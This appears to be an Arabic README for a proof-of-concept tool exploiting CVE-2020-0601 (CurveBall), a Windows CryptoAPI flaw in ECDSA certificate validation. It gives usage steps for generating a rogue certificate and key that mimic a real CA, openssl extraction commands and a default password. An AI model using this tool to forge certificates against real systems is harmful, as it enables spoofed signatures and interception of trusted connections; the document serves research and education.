
CVE-2020-0601: ثغرة Windows CryptoAPI. (CurveBall/ChainOfFools)
CVE-2020-0601: يُعرف أيضًا باسم CurveBall أو ChainOffFools، وهو ثغرة أمنية في Microsoft CryptoApi (وتحديدًا في Crypt32.dll) حيث لا يتم التحقق من توقيعات المنحنى الإهليلجي (ECDSA) للشهادات بشكل صحيح.
توجد مقالة مدونة جيدة جدًا هنا تشرح المشكلة بشكل واضح جدًا.
يجب استخدام هذا فقط للأغراض التعليمية والبحثية!
قم بتزويد تطبيق وحدة التحكم بمسار شهادة منحنى إهليلجي.
CurveBall.exe 'PathToCA.cer'
سيقوم البرنامج بإخراج ملف .p12 يحتوي على شهادة بنفس المفتاح العام والرقم التسلسلي للشهادة الأصلية، بالإضافة إلى مفتاح.
يمكن استخراج المفتاح والشهادة من ملف .p12 باستخدام openssl من خلال الأوامر التالية
openssl pkcs12 -in Rogue.p12 -nocerts -out CA.key
و
openssl pkcs12 -in Rogue.p12 -clcerts -nokeys -out CA.cer
ملاحظة: كلمة المرور الافتراضية هي 'Test1234'.